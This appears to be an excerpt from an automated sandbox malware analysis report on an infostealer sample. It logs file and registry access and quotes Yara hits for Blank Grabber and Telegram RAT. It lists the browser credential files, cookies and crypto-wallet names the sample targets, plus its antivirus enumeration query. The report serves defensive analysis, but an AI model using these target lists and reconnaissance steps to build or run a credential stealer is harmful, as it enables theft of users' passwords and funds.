              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF70AEFD080
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF15C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF70AF15C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4248CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,65_2_00007FF69A4248CC
              Source: C:\Users\user\Desktop\cmd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2090937481.000001C917404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7264, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI72642\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: EthereumZ
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystoreZ
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
